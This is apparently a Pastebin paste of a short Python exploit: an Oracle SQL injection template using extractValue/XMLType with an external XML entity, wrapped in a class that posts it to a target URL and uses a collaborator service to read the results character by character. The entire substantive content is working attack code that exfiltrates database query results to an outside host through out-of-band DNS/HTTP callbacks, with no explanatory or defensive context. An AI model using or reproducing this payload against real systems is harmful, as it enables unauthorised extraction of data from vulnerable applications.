Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- tpl = """'||(SELECT CASE WHEN ASCII(SUBSTR(({s._query}),{s._pos},1))<{guess} \
- THEN extractValue(XMLType('<?xml version="1.0" encoding="UTF-8"?>\
- <!DOCTYPE poc [ <!ENTITY % s2 SYSTEM "http://{payload}/">%s2;]>'),'/l') \
- ELSE '' END FROM dual)||'"""
- class OracleDuncan(duncan.Duncan):
- def decide(self, guess):
- c = Client()
- payload = c.generate_payload(include_location=True)
- requests.post(url, data={'q': tpl.format(s=self, guess=guess,
- payload=payload)}, allow_redirects=False)
- return c.fetch_collaborator_interactions_for(payload)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
